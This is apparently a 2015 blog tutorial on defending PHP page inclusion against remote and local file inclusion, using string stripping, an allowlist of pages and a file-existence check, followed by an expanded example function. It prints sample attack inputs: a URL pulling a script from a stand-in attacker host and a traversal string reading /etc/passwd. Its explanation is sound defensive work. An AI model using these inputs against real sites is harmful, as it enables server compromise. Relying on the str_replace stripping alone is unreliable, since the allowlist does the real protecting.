    Author
    chmood
    PHP Page Inclusion Hardening



    Remote File Inclusion (RFI) is a common web application bug. It is easy to exploit when the web developer forgets to validate the requested page before including it, because an attacker can then put the address of a remote script in the request variable.
    Example:

    http://site.com/?page=http://hack.er/script.txt??

    The script then includes it.

    During page processing, the attacker's script is included by the server and executed. Once that happens, the attacker has effectively got the server. And the administrator can only say dead!! Dead without blood, only tears.

    For that reason, validating a requested page before including it is very important. It is simple, but it is sometimes overlooked or forgotten. Here is a simple way to validate the requested page before inclusion.

    Let's start!

    $file is the variable that names the page I will include. It is sent with the GET method. This is the standard way to read the page to include from a GET variable.

    $file = $_GET['file'];


    Before validation, $file must be cleaned of "injected" values such as RFI or LFI strings. So, launder it first.

    $file = $_GET['file'];

    $file = str_replace("http://","",$file);

    $file = str_replace("/","",$file);

    $file = str_replace("..","",$file);

    Now $file is clear of injected values. See:

    $file = "http://hack.er/evil.txt";

    After laundering, $file is hack.erevil.txt

    And if someone tries an LFI string:

    $file = "../../../../../../../etc/passwd";

    After laundering, $file is etcpasswd

    $file is clear. Next step.

    A simple way to validate a page is to check that it exists in a directory. But checking the directory uses more of the server's memory. To reduce memory use, I check whether the file exists only after $file has been found valid. Valid pages are defined in an array that contains the list of valid pages.

    $validpage = array("article","contact","news","product");

    article, contact, news and product are valid pages. Put every valid page in $validpage.

    First validation: check $file. If $file is found in $validpage, it is a valid page.


    $file = (in_array($file,$validpage))?$file:"index";

    If $file is not in $validpage, the value of $file is replaced with "index".

    After this step, $file contains a valid page. Now I check that the file exists. I do not want to include a nonexistent file: an error on the page would give the attacker another clue.

    $file = (file_exists($file.".php"))?$file:"index";

    Done. $file is filtered and validated. Now I can include $file without worry.

    include($file.".php");


    Do not forget to provide an index.php file, because it is the default page when the requested file is not valid or does not exist.
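
The steps above combined into one function, as an added example that is not part of the original post: here the allowlist alone decides what is included, non-string input such as ?file[]=x is handled, and the comparison is strict. The name resolve_page(), the temporary page directory and the sample values are assumptions constructed for the demo.

```php
<?php
// Added example; resolve_page() and the page directory are hypothetical.
function resolve_page($requested, array $validPages, string $baseDir, string $default = 'index'): string
{
    // ?file[]=x makes $_GET['file'] an array and a missing key gives null:
    // anything that is not a string falls back to the default page.
    $page = is_string($requested) ? $requested : $default;

    // Strict comparison (third argument) avoids loose type juggling.
    if (!in_array($page, $validPages, true)) {
        $page = $default;
    }

    // An allowlisted name whose file is missing also falls back.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($path === false || !is_file($path)) {
        $path = realpath($baseDir . DIRECTORY_SEPARATOR . $default . '.php');
    }
    if ($path === false) {
        throw new RuntimeException('default page is missing');
    }
    return $path;
}

// Constructed demo: a throwaway page directory with index.php and news.php.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . uniqid();
mkdir($dir);
file_put_contents($dir . '/index.php', '<?php echo "index";');
file_put_contents($dir . '/news.php', '<?php echo "news";');

$validpage = array('article', 'contact', 'news', 'product');
$samples = array(                       // constructed request values
    'news',                             // valid name, file present
    'article',                          // valid name, file missing
    'http://hack.er/evil.txt',          // remote URL from the post
    '../../../../../../../etc/passwd',  // traversal string from the post
    array('news'),                      // what ?file[]=news produces
    null,                               // parameter absent
);
foreach ($samples as $s) {
    $shown = json_encode($s, JSON_UNESCAPED_SLASHES);
    echo str_pad($shown, 42), ' => ', basename(resolve_page($s, $validpage, $dir)), "\n";
}
// In the real page: include resolve_page($_GET['file'] ?? null, $validpage, __DIR__);
```

Only the first sample resolves to news.php; every other value resolves to index.php.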



    And now, I can sleep in peace and have sweet dreams.

    Thanks.

    ArRay
    Exploitations
    September 23, 2015 • 0 comments